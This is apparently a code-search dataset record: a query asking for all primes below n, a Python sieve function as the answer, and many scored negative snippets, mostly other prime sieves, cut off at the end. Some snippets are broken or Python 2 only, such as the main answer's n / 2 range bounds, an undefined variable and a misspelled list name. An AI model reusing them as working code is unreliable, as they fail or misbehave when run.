request_response files\n swagger_gen.generate_request_response()\n # testing properties\n swagger_gen.generate_definitions()\n # generating global parameters\n swagger_gen.generate_parameters()\n # generating global response\n swagger_gen.generate_responses()\n # generating urls\n swagger_gen.generate_urls()" ]
[ "0.65736026", "0.6416811", "0.6385334", "0.6240616", "0.621911", "0.6212363", "0.60647005", "0.60343623", "0.6023183", "0.6003032", "0.5997811", "0.5997811", "0.59653294", "0.59653294", "0.59533024", "0.5914431", "0.5902483", "0.5882451", "0.5871193", "0.5864147", "0.5847218", "0.5839081", "0.5836898", "0.5834619", "0.582073", "0.5786336", "0.5785289", "0.57823145", "0.576097", "0.57480675", "0.57465434", "0.57460046", "0.5744125", "0.57313526", "0.5718464", "0.57056034", "0.5701618", "0.56960374", "0.5692062", "0.56913054", "0.56815636", "0.56760967", "0.5674879", "0.56707335", "0.5667781", "0.56640786", "0.5661686", "0.5656439", "0.56475204", "0.56166506", "0.561312", "0.55943024", "0.55908144", "0.555876", "0.5557079", "0.5555876", "0.5554873", "0.55521053", "0.5521745", "0.5519078", "0.55014074", "0.55012065", "0.55009127", "0.5488805", "0.5488805", "0.54837096", "0.5460477", "0.54442924", "0.54427665", "0.5440118", "0.54368824", "0.54358417", "0.54348516", "0.54312587", "0.5426974", "0.5425723", "0.5422673", "0.54156065", "0.5412663", "0.5408391", "0.53980654", "0.539291", "0.5392056", "0.53904015", "0.5387984", "0.53866076", "0.53837717", "0.5382952", "0.53799516", "0.53732705", "0.5371816", "0.5371816", "0.5371816", "0.5370965", "0.53687894", "0.5366352", "0.5359429", "0.5359073", "0.5349814", "0.53456074", "0.53331685" ]
0.0
-1
Find all prime numbers between 0 and n
def get_primes(n): primes = [True] * (n / 2) for i in range(int((n / 2 - 1) / 2) >> 1): for j in range((i * (i + 3) << 1) + 3, n / 2, (i << 1) + 3): primes[j] = False return [2] + [((i << 1) + 3) for i in range(n / 2) if (primes[i])]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def primes(n):\n return [i for i in xrange(1, n + 1) if mr_prime(i)]", "def find_n_primes(n):\n primes = [ ]\n\n if n < 2:\n return None;\n\n primes.append(2)\n\n for i in range(3, n + 1, 2):\n is_prime = True\n for p in primes:\n if i % p is 0:\n is_prime = False\n continue\n if is_prime:\n primes.append(i)\n return primes", "def primes(n):\n sqrtN=n**0.5\n odds=[2]\n odds+=[i for i in range(3,n) if i%2>0]\n\n for i in odds:\n if i!=0 and i<=sqrtN:\n for j in odds[odds.index(i)+1:]:\n if j%i==0:\n odds[odds.index(j)]=0\n return [i for i in odds if i!=0]", "def make_primes(n):\n out_list = []\n for i in range(2, n):\n if is_prime(i):\n out_list.append(i)\n return out_list", "def primesupto(n):\n # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188\n sieve = [True] * (n//2)\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i//2]:\n sieve[i*i//2::i] = [False] * ((n-i*i-1)//(2*i)+1)\n return [2] + [2*i+1 for i in range(1,n//2) if sieve[i]]", "def get_primes(n):\n\n return list(primes_sieve(n))", "def primes(n):\n return [i for i, v in enumerate(prime_cache(n)) if v]", "def primes(n, DEBUG=False):\n\n return [x[0] for x in enumerate(_sieve(n, DEBUG=DEBUG)[0:n+1]) if x[1]]", "def primes(n):\n\tsieve = [True] * n\n\tyield 2\n\tfor i in xrange(3,int(n**0.5)+1,2):\n\t\tif sieve[i]:\n\t\t\tyield i\n\t\t\tsieve[i*i::2*i] = [False]*((n-i*i-1)/(2*i)+1)\n\tfor i in xrange(i+2,n,2):\n\t\tif sieve[i]: yield i", "def list_primes(n):\n primeList = []\n for i in range(n):\n if is_prime(i):\n primeList.append(i)\n return primeList", "def primes(n):\n sieve = [True] * n\n for i in range(3, int(n ** 0.5) + 1, 2):\n if sieve[i]:\n sieve[i * i::2 * i] = [False] * int(((n - i * i - 1) // (2 * i) + 1))\n return [2] + [i for i in range(3, n, 2) if sieve[i]]", "def primes(n):\n if n == 0 or n == 1:\n return []\n else:\n p = primes(int(sqrt(n)))\n no_p = { j for i in p for j in xrange(i*2, n+1, i) }\n p = { x for x in xrange(2, n + 1) if x not in no_p }\n return p", "def primes(n):\n sieve = [True] * n\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i]:\n sieve[i*i::2*i]=[False]*int(((n-i*i-1)/(2*i)+1))\n return [2] + [i for i in range(3,n,2) if sieve[i]]", "def primes(n):\n sieve = [True] * n\n for i in xrange(3,int(n**0.5)+1,2):\n if sieve[i]:\n sieve[i*i::2*i]=[False]*((n-i*i-1)/(2*i)+1)\n return [2] + [i for i in xrange(3,n,2) if sieve[i]]", "def primes(n):\n sieve = [True] * n\n for i in xrange(3,int(n**0.5)+1,2):\n if sieve[i]:\n sieve[i*i::2*i]=[False]*((n-i*i-1)/(2*i)+1)\n return [2] + [i for i in xrange(3,n,2) if sieve[i]]", "def primes(n):\n sieve = [True] * n\n for i in xrange(3,int(n**0.5)+1,2):\n if sieve[i]:\n sieve[i*i::2*i]=[False]*((n-i*i-1)/(2*i)+1)\n return [2] + [i for i in xrange(3,n,2) if sieve[i]]", "def primes(n):\n sieve = [True] * n\n for i in range(3, int(n**0.5)+1,2):\n if sieve[i]:\n sieve[i*i::2*i]=[False]*((n-i*i-1)/(2*i)+1)\n return [2] + [i for i in range(3,n,2) if sieve[i]]", "def primes_less(n):\n test_nums = list(range(3, int(floor(sqrt(n))), 2))\n prime_flags = [True] * ((n - 2) // 2)\n for a in test_nums:\n next_div = a**2\n while next_div < n:\n prime_flags[(next_div-3)//2] = False\n next_div += 2*a\n return [2] + [2*i + 3 for i, flag in enumerate(prime_flags) if flag]", "def generate_prime_less_than_n(n):\n\tif n <= 1:\n\t\treturn []\n\tlist_of_primes = [2]\n\tfor i in range(3, n, 2):\n\t\tis_prime = True\n\t\tfor j in list_of_primes:\n\t\t\tif i%j == 0:\n\t\t\t\tis_prime = False\n\t\t\t\tbreak\n\t\tif 
is_prime:\n\t\t\tlist_of_primes.append(i)\n\treturn list_of_primes", "def sieve(n):\n #All even numbers except 2 are not primes\n primes = [False, False, True] + [True, False] * (n / 2)\n\n #Start with 3\n p = 3\n\n while p*p <= n:\n if primes[p]:\n #p is prime, cross off all multiples of p, starting at the square \n #of p since all smaller multiples have already been crossed off\n d = p*p\n while d <= n:\n primes[d] = False\n d += p\n p += 2\n\n #Build a list of the primes we've found\n return [i for i in range(n) if primes[i]]", "def primesToNumber(n):\r\n sieve = [True] * n\r\n for i in xrange(3,int(n**0.5)+1,2):\r\n if sieve[i]:\r\n sieve[i*i::2*i]=[False]*((n-i*i-1)/(2*i)+1)\r\n return [2] + [i for i in xrange(3,n,2) if sieve[i]]", "def primes(n):\n result = []\n i = 2\n while n > 0:\n if isPrime(i):\n result += [i]\n n -= 1\n i += 1\n return result", "def sieve_of_eratosthenes(n: int) -> List[int]:\n\n prime = [True for i in range(n+1)] #initiate array named prime with all value True, ie everynumber [0,n] are prime\n p = 2\n while (p * p <= n):\n # If prime[p] is not\n # changed, then it is a prime\n if (prime[p] == True): #if any number is prime then its multiple must be composite\n # Update all multiples of p to be not prime \n for i in range(p * p, n+1, p):\n prime[i] = False\n p += 1\n\n\n '''\n till here the status of code is:\n 0:prime\n 1:prime\n 2:prime\n 3:prime\n 5:prime\n 7:prime\n 11:prime\n .\n .\n .\n\n But 0 and 1 are not prime, so we will have to count numbers from 2\n '''\n\n return [i for i, p in enumerate(prime[2:], 2) if p]", "def prime_divisors(n):\r\n\treturn list(set(factors(n)))", "def primes1(n):\n sieve = [True] * (n//2)\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i//2]:\n sieve[i*i//2::i] = [False] * ((n-i*i-1)//(2*i)+1)\n return [2] + [2*i+1 for i in range(1,n//2) if sieve[i]]", "def getNPrime(num):\n prime_numbers = []\n for i in range(num):\n if isPrime(i + 1):\n prime_numbers.append(i)\n return prime_numbers", "def get_probable_prime(n: int) -> [int]:\n return [6*n-1, 6*n+1]", "def sieve(n):\n global primes; lower = len(primes)\n if n+1 > lower:\n primes += [True, False] * ((n-lower)/2+1)\n for i in xrange(3, int(math.sqrt(n)+1), 2):\n if primes[i]:\n for j in xrange(3*i, n+1, 2*i):\n if j >= lower:\n primes[j] = False\n return [i for i, is_prime in enumerate(primes) if is_prime]", "def primi(n):\n numVec = []\n for x in range(n-1):\n numVec.append(x+2)\n for num in numVec[:(n//2-1)]:\n if numVec[num-2] != 0:\n numVec[slice(2*num-2, n-1, num)] = [0]*(n//num-1)\n numVec = [x for x in numVec if x!=0]\n return numVec", "def primes(n):\n sieve = [True]*n\n for p in range(2, n):\n if sieve[p]:\n yield p\n for i in range(p*p, n, p):\n sieve[i] = False", "def primes():\n yield 1\n primes = []\n for n in itertools.count(2):\n if not any(n % p == 0 for p in primes):\n # No divisor found among previous primes\n yield n\n primes.append(n)", "def prime_sieve(n):\n upper_bound = int(math.sqrt(n))\n primes = [True] * (n + 1)\n primes[0] = primes[1] = False\n for i in range(upper_bound + 1):\n if not primes[i]:\n continue\n for j in range(2, n // i + 1):\n if i*j < n:\n primes[i*j] = False\n return primes", "def next_prime(n):\n i = 1\n known_prime = []\n while i < n:\n if is_prime(i, known_prime):\n known_prime.append(i)\n yield i\n i += 1", "def list_primes(n):\n\tarr = [True] * n\n\tarr[0] = False\n\tarr[1] = False\n\tfor i in range(2, int(math.sqrt(n)) + 1):\n\t\tif is_prime(i):\n\t\t\tfor j in range(2 * i, n, i):\n\t\t\t\tarr[j] = False\n\tprimes = []\n\tfor 
i in range(len(arr)):\n\t\tif arr[i]:\n\t\t\tprimes.append(i)\n\treturn primes", "def primes():\n yield 2\n found = []\n for i in itertools.count(start=3, step=2):\n for p in found:\n if i % p == 0:\n break\n else:\n yield i\n found.append(i)", "def prime_divisors(n):\n\treturn tuple(set(factors(n)))", "def prime_factorization(n):\r\n result = []\r\n for i in xrange(2, n+1):\r\n s = 0;\r\n while n / float(i) == floor(n/float(i)):\r\n n = n / float(i)\r\n s += 1\r\n if s > 0:\r\n for k in range(s):\r\n result.append(i)\r\n if n == 1:\r\n return result", "def primes_below(n):\n L, M = [2], [x for x in range(3, int(n), 2)]\n if n <= 2:\n print('There are no primes below 2')\n return None\n for i in range(3, int(n), 2):\n if M[i // 2 - 1] != 0 and is_prime(i):\n L.append(i)\n for j in range(i, int(n), 2 * i):\n M[j // 2 - 1] = 0\n return L", "def rwh_primes1(n):\n # http://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188\n sieve = [True] * int((n/2))\n for i in range(3,int(n**0.5)+1,2):\n if sieve[int(i/2)]:\n sieve[int(i*i/2)::i] = [False] * int(((n-i*i-1)/(2*i)+1))\n return [2] + [2*i+1 for i in range(1,int(n/2)) if sieve[int(i)]]", "def primesfrom2to(n):\n # http://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188\n if n == 1:\n return []\n elif n == 2:\n return []\n elif n == 3:\n return [2]\n elif n == 4:\n return [2, 3]\n elif n == 5:\n return [2, 3]\n sieve = np.ones(n/3 + (n % 6 == 2), dtype=np.bool)\n sieve[0] = False\n for i in xrange(int(n**0.5)/3+1):\n if sieve[i]:\n k = 3 * i + 1 | 1\n sieve[ ((k*k)/3) ::2*k] = False\n sieve[(k*k+4*k-2*k*(i&1))/3::2*k] = False\n return map(int, np.r_[2, 3, ((3*np.nonzero(sieve)[0]+1) | 1)])", "def primesfrom2to(n):\n # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188\n sieve = np.ones(n//3 + (n%6==2), dtype=np.bool)\n sieve[0] = False\n for i in range(int(n**0.5)//3+1):\n if sieve[i]:\n k=3*i+1|1\n sieve[ ((k*k)//3) ::2*k] = False\n sieve[(k*k+4*k-2*k*(i&1))//3::2*k] = False\n return np.r_[2,3,((3*np.nonzero(sieve)[0]+1)|1)]", "def find_prime_permutations(primes, n):\n\n candidates = [int(\"\".join(digits)) for digits in sorted(set(permutations(str(n))))]\n return [c for c in candidates if c in primes]", "def get_n_primes(n):\n\n primes = [' ']\n num = 2\n while len(primes) < n + 1:\n if is_prime(num):\n primes.append(num)\n num += 1\n return primes", "def primesfrom2to(n):\r\n # http://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188\r\n sieve = np.ones(n/3 + (n%6==2), dtype=np.bool)\r\n sieve[0] = False\r\n for i in xrange(int(n**0.5)/3+1):\r\n if sieve[i]:\r\n k=3*i+1|1\r\n sieve[ ((k*k)/3) ::2*k] = False\r\n sieve[(k*k+4*k-2*k*(i&1))/3::2*k] = False\r\n return np.r_[2,3,((3*np.nonzero(sieve)[0]+1)|1)]", "def sieve(n):\n\n results = [1 for _ in range(n+1)]\n results[0], results[1] = 0, 0\n results = [0,0] + [1]*(n - 1)\n len(results)\n div = 2\n\n for i,num in enumerate(results):\n if num:\n k = i * 2\n while k <= n:\n seive[k] = 0\n k+= i\n return [x for (x,y) in enumerate(results) if y]\n\n while div <= n // 2 + 1:\n for i in range(div * div, n+1, div):\n if results[i] == 0:\n continue\n else:\n results[i] = 0\n div += 1\n\n #return sum(results)\n return [i for i in range(len(results)) if results[i] == 1]", "def primesfrom2to(n):\n # 
http://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188\n sieve = np.ones(n/3 + (n%6==2), dtype=np.bool)\n sieve[0] = False\n for i in xrange(int(n**0.5)/3+1):\n if sieve[i]:\n k=3*i+1|1\n sieve[ ((k*k)/3) ::2*k] = False\n sieve[(k*k+4*k-2*k*(i&1))/3::2*k] = False\n return np.r_[2,3,((3*np.nonzero(sieve)[0]+1)|1)]", "def sieve_for_primes_to(n):\n sieve = [True] * (n//2)\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i//2]:\n sieve[i*i//2::i] = [False] * ((n-i*i-1)//(2*i)+1)\n return [2] + [2*i+1 for i in range(1,n//2) if sieve[i]]", "def primes(n_max: int = 100) -> List[int]:\n if n_max < 2:\n raise ValueError\n\n t = list(range(2, n_max + 1))\n for i in t:\n for j in (k for k in t if k > i):\n if j % i == 0:\n t.remove(j)\n\n return sorted(t)", "def primes(n: int) -> list:\n primes = [2]\n pot_primes = list(range(2,n+1))\n for number in pot_primes:\n for prime in primes:\n if number // prime == 0:\n continue\n else:\n primes += [x]\n\n\n print (primes)", "def prime_numpy_version(n: int) -> List[int]:\n arm = range(2, np.floor(n / 2).astype(int) + 1)\n x, y = np.meshgrid(*([arm] * 2))\n\n Z = range(2, n + 1)\n D = x * y\n Diff = np.setdiff1d\n\n P = Diff(Z, D[D <= n].ravel())\n return P.tolist()", "def first_n_primes(n): \n\tlist_of_primes = []\n\t# the current number that we're checking the primality of\n\tcandidate = 2\n\n\t# keep on finding primes until our list has enough elements\n\twhile len(list_of_primes) < n:\n\t\t# assume that we have a prime number\n\t\tis_prime = True\n\n\t\t# use trial division to determine if it's not prime\n\t\tfor i in range(2, candidate):\n\t\t\t# once we know it's not prime, break!\n\t\t\tif candidate % i == 0:\n\t\t\t\tis_prime = False\n\t\t\t\tbreak\n\t\tif is_prime:\n\t\t\tlist_of_primes.append(candidate)\n\t\tcandidate += 1\n\treturn list_of_primes", "def primish(n):\n\n factors = set()\n for i in range(n, 1, -1):\n\n # Find the smallest divisor of i.\n smallest = 2\n while (i % smallest) != 0:\n smallest += 1\n\n # Divide by that divisor until we have 1 or something else.\n remainder = i\n while (remainder % smallest) == 0:\n remainder /= smallest\n\n # Keep it if needed.\n if remainder == 1:\n factors.add(i)\n\n return factors", "def gen_primes(N):\n primes = set()\n for n in range(2, N):\n if all(n % p > 0 for p in primes):\n primes.add(n)\n yield n", "def prime_sieve(n):\n li = [True] * n\n li[0] = li[1] = False\n\n for (i, isprime) in enumerate(li):\n if isprime:\n yield i\n for j in range(i*i, n, i):\n li[j] = False\n return(li)", "def primes_list(n):\n count = 0\n if n <= 7:\n p_list = [2, 3, 5, 7, 11, 13, 17]\n return p_list[:n]\n else:\n upper_bound = int(n * log(n) + n * log(log(n)))\n return primes(upper_bound)[:n]", "def primesList(n):\n sieve = [True]*n\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i]:\n sieve[2*i::i] = [False]*(len(sieve[2*i::i]))\n return [2]+[i for i in range(3,n,2) if sieve[i]]", "def basic_is_prime(_n):\n if _n < 2:\n return False\n for p in [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101,\n 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199,\n 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317,\n 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443,\n 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577,\n 587, 593, 599, 601, 
607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701,\n 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839,\n 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983,\n 991, 997, 1009, 1013, 1019, 1021, 1031, 1033, 1039, 1049, 1051, 1061, 1063, 1069, 1087, 1091, 1093,\n 1097, 1103, 1109, 1117, 1123, 1129, 1151, 1153, 1163, 1171, 1181, 1187, 1193, 1201, 1213, 1217, 1223,\n 1229, 1231, 1237, 1249, 1259, 1277, 1279, 1283, 1289, 1291, 1297, 1301, 1303, 1307, 1319, 1321, 1327,\n 1361, 1367, 1373, 1381, 1399, 1409, 1423, 1427, 1429, 1433, 1439, 1447, 1451, 1453, 1459, 1471, 1481,\n 1483, 1487, 1489, 1493, 1499, 1511, 1523, 1531, 1543, 1549, 1553, 1559, 1567, 1571, 1579, 1583, 1597,\n 1601, 1607, 1609, 1613, 1619, 1621, 1627, 1637, 1657, 1663, 1667, 1669, 1693, 1697, 1699, 1709, 1721,\n 1723, 1733, 1741, 1747, 1753, 1759, 1777, 1783, 1787, 1789, 1801, 1811, 1823, 1831, 1847, 1861, 1867,\n 1871, 1873, 1877, 1879, 1889, 1901, 1907, 1913, 1931, 1933, 1949, 1951, 1973, 1979, 1987, 1993, 1997,\n 1999, 2003, 2011, 2017, 2027, 2029, 2039, 2053, 2063, 2069, 2081, 2083, 2087, 2089, 2099, 2111, 2113,\n 2129, 2131, 2137, 2141, 2143, 2153, 2161, 2179, 2203, 2207, 2213, 2221, 2237, 2239, 2243, 2251, 2267,\n 2269, 2273, 2281, 2287, 2293, 2297, 2309, 2311, 2333, 2339, 2341, 2347, 2351, 2357, 2371, 2377, 2381,\n 2383, 2389, 2393, 2399, 2411, 2417, 2423, 2437, 2441, 2447, 2459, 2467, 2473, 2477, 2503, 2521, 2531,\n 2539, 2543, 2549, 2551, 2557, 2579, 2591, 2593, 2609, 2617, 2621, 2633, 2647, 2657, 2659, 2663, 2671,\n 2677, 2683, 2687, 2689, 2693, 2699, 2707, 2711, 2713, 2719, 2729, 2731, 2741, 2749, 2753, 2767, 2777,\n 2789, 2791, 2797, 2801, 2803, 2819, 2833, 2837, 2843, 2851, 2857, 2861, 2879, 2887, 2897, 2903, 2909,\n 2917, 2927, 2939, 2953, 2957, 2963, 2969, 2971, 2999, 3001, 3011, 3019, 3023, 3037, 3041, 3049, 3061,\n 3067, 3079, 3083, 3089, 3109, 3119, 3121, 3137, 3163, 3167, 3169, 3181, 3187, 3191, 3203, 3209, 3217,\n 3221, 3229, 3251, 3253, 3257, 3259, 3271, 3299, 3301, 3307, 3313, 3319, 3323, 3329, 3331, 3343, 3347,\n 3359, 3361, 3371, 3373, 3389, 3391, 3407, 3413, 3433, 3449, 3457, 3461, 3463, 3467, 3469, 3491, 3499,\n 3511, 3517, 3527, 3529, 3533, 3539, 3541, 3547, 3557, 3559, 3571, 3581, 3583, 3593, 3607, 3613, 3617,\n 3623, 3631, 3637, 3643, 3659, 3671, 3673, 3677, 3691, 3697, 3701, 3709, 3719, 3727, 3733, 3739, 3761,\n 3767, 3769, 3779, 3793, 3797, 3803, 3821, 3823, 3833, 3847, 3851, 3853, 3863, 3877, 3881, 3889, 3907,\n 3911, 3917, 3919, 3923, 3929, 3931, 3943, 3947, 3967, 3989, 4001, 4003, 4007, 4013, 4019, 4021, 4027,\n 4049, 4051, 4057, 4073, 4079, 4091, 4093, 4099, 4111, 4127, 4129, 4133, 4139, 4153, 4157, 4159, 4177,\n 4201, 4211, 4217, 4219, 4229, 4231, 4241, 4243, 4253, 4259, 4261, 4271, 4273, 4283, 4289, 4297, 4327,\n 4337, 4339, 4349, 4357, 4363, 4373, 4391, 4397, 4409, 4421, 4423, 4441, 4447, 4451, 4457, 4463, 4481,\n 4483, 4493, 4507, 4513, 4517, 4519, 4523, 4547, 4549, 4561, 4567, 4583, 4591, 4597, 4603, 4621, 4637,\n 4639, 4643, 4649, 4651, 4657, 4663, 4673, 4679, 4691, 4703, 4721, 4723, 4729, 4733, 4751, 4759, 4783,\n 4787, 4789, 4793, 4799, 4801, 4813, 4817, 4831, 4861, 4871, 4877, 4889, 4903, 4909, 4919, 4931, 4933,\n 4937, 4943, 4951, 4957, 4967, 4969, 4973, 4987, 4993, 4999, 5003, 5009, 5011, 5021, 5023, 5039, 5051,\n 5059, 5077, 5081, 5087, 5099, 5101, 5107, 5113, 5119, 5147, 5153, 5167, 5171, 5179, 5189, 5197, 5209,\n 5227, 5231, 5233, 5237, 5261, 5273, 5279, 
5281, 5297, 5303, 5309, 5323, 5333, 5347, 5351, 5381, 5387,\n 5393, 5399, 5407, 5413, 5417, 5419, 5431, 5437, 5441, 5443, 5449, 5471, 5477, 5479, 5483, 5501, 5503,\n 5507, 5519, 5521, 5527, 5531, 5557, 5563, 5569, 5573, 5581, 5591, 5623, 5639, 5641, 5647, 5651, 5653,\n 5657, 5659, 5669, 5683, 5689, 5693, 5701, 5711, 5717, 5737, 5741, 5743, 5749, 5779, 5783, 5791, 5801,\n 5807, 5813, 5821, 5827, 5839, 5843, 5849, 5851, 5857, 5861, 5867, 5869, 5879, 5881, 5897, 5903, 5923,\n 5927, 5939, 5953, 5981, 5987, 6007, 6011, 6029, 6037, 6043, 6047, 6053, 6067, 6073, 6079, 6089, 6091,\n 6101, 6113, 6121, 6131, 6133, 6143, 6151, 6163, 6173, 6197, 6199, 6203, 6211, 6217, 6221, 6229, 6247,\n 6257, 6263, 6269, 6271, 6277, 6287, 6299, 6301, 6311, 6317, 6323, 6329, 6337, 6343, 6353, 6359, 6361,\n 6367, 6373, 6379, 6389, 6397, 6421, 6427, 6449, 6451, 6469, 6473, 6481, 6491, 6521, 6529, 6547, 6551,\n 6553, 6563, 6569, 6571, 6577, 6581, 6599, 6607, 6619, 6637, 6653, 6659, 6661, 6673, 6679, 6689, 6691,\n 6701, 6703, 6709, 6719, 6733, 6737, 6761, 6763, 6779, 6781, 6791, 6793, 6803, 6823, 6827, 6829, 6833,\n 6841, 6857, 6863, 6869, 6871, 6883, 6899, 6907, 6911, 6917, 6947, 6949, 6959, 6961, 6967, 6971, 6977,\n 6983, 6991, 6997, 7001, 7013, 7019, 7027, 7039, 7043, 7057, 7069, 7079, 7103, 7109, 7121, 7127, 7129,\n 7151, 7159, 7177, 7187, 7193, 7207, 7211, 7213, 7219, 7229, 7237, 7243, 7247, 7253, 7283, 7297, 7307,\n 7309, 7321, 7331, 7333, 7349, 7351, 7369, 7393, 7411, 7417, 7433, 7451, 7457, 7459, 7477, 7481, 7487,\n 7489, 7499, 7507, 7517, 7523, 7529, 7537, 7541, 7547, 7549, 7559, 7561, 7573, 7577, 7583, 7589, 7591,\n 7603, 7607, 7621, 7639, 7643, 7649, 7669, 7673, 7681, 7687, 7691, 7699, 7703, 7717, 7723, 7727, 7741,\n 7753, 7757, 7759, 7789, 7793, 7817, 7823, 7829, 7841, 7853, 7867, 7873, 7877, 7879, 7883, 7901, 7907,\n 7919, 7927, 7933, 7937, 7949, 7951, 7963, 7993, 8009, 8011, 8017, 8039, 8053, 8059, 8069, 8081, 8087,\n 8089, 8093, 8101, 8111, 8117, 8123, 8147, 8161, 8167, 8171, 8179, 8191, 8209, 8219, 8221, 8231, 8233,\n 8237, 8243, 8263, 8269, 8273, 8287, 8291, 8293, 8297, 8311, 8317, 8329, 8353, 8363, 8369, 8377, 8387,\n 8389, 8419, 8423, 8429, 8431, 8443, 8447, 8461, 8467, 8501, 8513, 8521, 8527, 8537, 8539, 8543, 8563,\n 8573, 8581, 8597, 8599, 8609, 8623, 8627, 8629, 8641, 8647, 8663, 8669, 8677, 8681, 8689, 8693, 8699,\n 8707, 8713, 8719, 8731, 8737, 8741, 8747, 8753, 8761, 8779, 8783, 8803, 8807, 8819, 8821, 8831, 8837,\n 8839, 8849, 8861, 8863, 8867, 8887, 8893, 8923, 8929, 8933, 8941, 8951, 8963, 8969, 8971, 8999, 9001,\n 9007, 9011, 9013, 9029, 9041, 9043, 9049, 9059, 9067, 9091, 9103, 9109, 9127, 9133, 9137, 9151, 9157,\n 9161, 9173, 9181, 9187, 9199, 9203, 9209, 9221, 9227, 9239, 9241, 9257, 9277, 9281, 9283, 9293, 9311,\n 9319, 9323, 9337, 9341, 9343, 9349, 9371, 9377, 9391, 9397, 9403, 9413, 9419, 9421, 9431, 9433, 9437,\n 9439, 9461, 9463, 9467, 9473, 9479, 9491, 9497, 9511, 9521, 9533, 9539, 9547, 9551, 9587, 9601, 9613,\n 9619, 9623, 9629, 9631, 9643, 9649, 9661, 9677, 9679, 9689, 9697, 9719, 9721, 9733, 9739, 9743, 9749,\n 9767, 9769, 9781, 9787, 9791, 9803, 9811, 9817, 9829, 9833, 9839, 9851, 9857, 9859, 9871, 9883, 9887,\n 9901, 9907, 9923, 9929, 9931, 9941, 9949, 9967, 9973]:\n if _n % p == 0:\n return _n == p\n if _n < 1E8: # Limit 1E8, because we have all primes below 1E4\n return True\n else:\n return None", "def sieve(n):\n\tif n < 2:\n\t\treturn []\n\telse:\n\t\tis_prime = [True] * n\n\t\tis_prime[0] = is_prime[1] = False\n\t\tfor i in range(2, n):\n\t\t\tif 
is_prime[i]:\n\t\t\t\tyield i\n\t\t\t\tfor num in range(i*i, n, i):\n\t\t\t\t\tis_prime[num] = False", "def rwh_primes1(n):\n sieve = [True] * (n/2)\n for i in xrange(3,int(n**0.5)+1,2):\n if sieve[i/2]:\n sieve[i*i/2::i] = [False] * ((n-i*i-1)/(2*i)+1)\n return [2] + [2*i+1 for i in xrange(1,n/2) if sieve[i]]", "def primes_from_2_to(n):\n sieve = np.ones(n // 3 + (n % 6 == 2), dtype=bool)\n for i in range(1, int(n ** 0.5) // 3 + 1):\n k = 3 * i + 1 | 1\n sieve[k * k // 3::2 * k] = False\n sieve[k * (k - 2 * (i & 1) + 4) // 3::2 * k] = False\n return np.r_[2, 3, ((3 * np.nonzero(sieve)[0][1:] + 1) | 1)]", "def primeSieve(n):\n result = []\n sieve = array.array('i', (True for i in range(0, n+1)))\n for k in range(2, n+1):\n if sieve[k]:\n result.append(k)\n i = k * k\n while i <= n:\n sieve[i] = False\n i += k\n return result", "def sieve(upto):\n return list(prime_numbers(upto))", "def EratosthenesSieve(N):\n numbers = [True] * (N+1)\n max_p = int(math.sqrt(N))\n for p in (i for i in range(2, max_p+1) if numbers[i]):\n for q in range(p*p, N+1, p):\n numbers[q] = False\n return [i for i in range(2, N+1) if numbers[i]]", "def primesfrom3to(n):\n sieve = numpy.ones(n//2, dtype=numpy.bool)\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i//2]:\n sieve[i*i//2::i] = False\n return 2*numpy.nonzero(sieve)[0][1::]+1", "def sieve(n):\n s = [True] * (n + 1)\n for i in range(2, isqrt(n) + 1):\n if s[i]:\n for j in range(i + i, n + 1, i):\n s[j] = False\n return [i for i in range(2, n + 1) if s[i]]", "def primeSieve(n):\n\tsieve = numpy.ones(n/3 + (n%6==2), dtype=numpy.bool)\n\tfor i in xrange(1,int(n**0.5)/3+1):\n\t\tif sieve[i]:\n\t\t\tk=3*i+1|1\n\t\t\tsieve[ k*k/3 ::2*k] = False\n\t\t\tsieve[k*(k-2*(i&1)+4)/3::2*k] = False\n\treturn numpy.r_[2,3,((3*numpy.nonzero(sieve)[0][1:]+1)|1)]", "def isprime(n):\n if n % 2 == 0:return False\n return all(n % i for i in range(3, int(n**0.5) + 1, 2))", "def primesfrom2to( n ):\n sieve = numpy.ones( n / 3 + ( n % 6 == 2 ), dtype = numpy.bool )\n for i in range( 1, int( ( n ** 0.5 ) / 3 ) + 1 ):\n if sieve[i]:\n k = 3 * i + 1 | 1\n sieve[ k * k / 3 ::2 * k] = False\n sieve[k * ( k - 2 * ( i & 1 ) + 4 ) / 3::2 * k] = False\n return numpy.r_[2, 3, ( ( 3 * numpy.nonzero( sieve )[0][1:] + 1 ) | 1 )]", "def find_first_n_primes(n):\n primes = []\n to_check = 2\n\n while len(primes) < n:\n if is_prime(to_check, primes):\n primes.append(to_check)\n to_check += 1\n print('The first {} prime numbers are: {}'.format(n, primes))\n return set(primes)", "def EratosthenesSieve(N):\n numbers = [True] * (N + 1)\n max_p = int(math.sqrt(N))\n for p in (i for i in range(2, max_p + 1) if numbers[i]):\n for q in range(p * p, N + 1, p):\n numbers[q] = False\n return [i for i in range(2, N + 1) if numbers[i]]", "def prime_numbers_determination_list(n: int)-> 